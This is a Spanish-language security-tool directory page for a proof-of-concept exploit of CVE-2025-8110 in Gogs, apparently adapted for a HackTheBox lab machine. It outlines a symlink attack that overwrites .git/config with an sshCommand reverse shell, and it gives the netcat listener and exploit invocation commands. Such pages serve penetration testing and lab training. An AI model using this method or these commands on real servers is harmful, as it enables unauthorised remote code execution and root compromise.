Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-8110 — Explotar el servicio Gogs y obtener el usuario root | Kitploit
Herramientas/GitHubGitHub/ixzodiak/cve-2025-8110
ExplotaciónExplotación de Aplicaciones WebCTFPruebas de PenetraciónAprendizaje y EducaciónRed TeamingHerramienta de Acceso Remoto
GitHubixzodiak/cve-2025-8110

CVE-2025-8110

Explotar el servicio Gogs y obtener el usuario root

Ver Repositorio
49hace 1 mesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-8110 — PoC de RCE en Gogs (Silentium / HackTheBox)

Descargo de responsabilidad: Esta herramienta está destinada estrictamente a fines educativos y pruebas de penetración autorizadas. Úsela únicamente contra sistemas para los que tenga permiso explícito.


Esta es una versión modificada de zAbuQasem/gogs-CVE-2025-8110, adaptada para funcionar contra la máquina Silentium en HackTheBox. El PoC original requería ajustes para manejar la configuración específica de Gogs de Silentium y su flujo de autenticación.


La Vulnerabilidad

CVE-2025-8110 es una vulnerabilidad de Ejecución Remota de Código en Gogs, un servicio Git autoalojado.

El endpoint de la API de actualización de archivos de Gogs (PUT /api/v1/repos/.../contents/<file>) no valida si el archivo destino es un enlace simbólico. Un atacante autenticado puede enviar un enlace simbólico a un repositorio que apunte a .git/config, y luego usar la API para sobrescribirlo con una carga maliciosa. La carga inyecta un sshCommand personalizado en la configuración de git, el cual Gogs ejecuta en el lado del servidor la próxima vez que realice una operación SSH en ese repositorio, resultando en una ejecución remota de código.


Lo que hace el PoC

Descargar herramienta
  1. Se autentica en Gogs y extrae un token CSRF de la página de inicio de sesión.
  2. Genera un token de API de Gogs a través de la página de configuración del usuario.
  3. Crea un nuevo repositorio a través de la API con SSH habilitado.
  4. Clona el repositorio localmente, coloca un enlace simbólico (malicious_link -> .git/config), y lo sube.
  5. Llama a la API de actualización de archivos en el enlace simbólico, escribiendo un .git/config malicioso que contiene sshCommand = <reverse shell>.
  6. Gogs sigue el enlace simbólico y sobrescribe su propio .git/config, lo que activa la shell en la siguiente operación SSH.

Uso

Instalar dependencias:

root@kitploit:~
pip install -r requirements.txt

Iniciar un listener:

root@kitploit:~
nc -lvnp <PORT>

Ejecutar el exploit:

root@kitploit:~
python3 CVE-2025-8110.py -u http://<TARGET_URL> -lh <YOUR_IP> -lp <PORT> -un <USERNAME> -pw <PASSWORD>

Opcional — enrutar a través de Burp Suite:

root@kitploit:~
python3 CVE-2025-8110.py -u http://<TARGET_URL> -lh <YOUR_IP> -lp <PORT> -un <USERNAME> -pw <PASSWORD> -x
FlagDescripción
-uURL base de Gogs
-lhTu IP de atacante (host de la reverse shell)
-lpTu puerto de listener
-unTu nombre de usuario registrado en Gogs
-pwTu contraseña de Gogs
-x(Opcional) Enrutar el tráfico a través de Burp en localhost:8080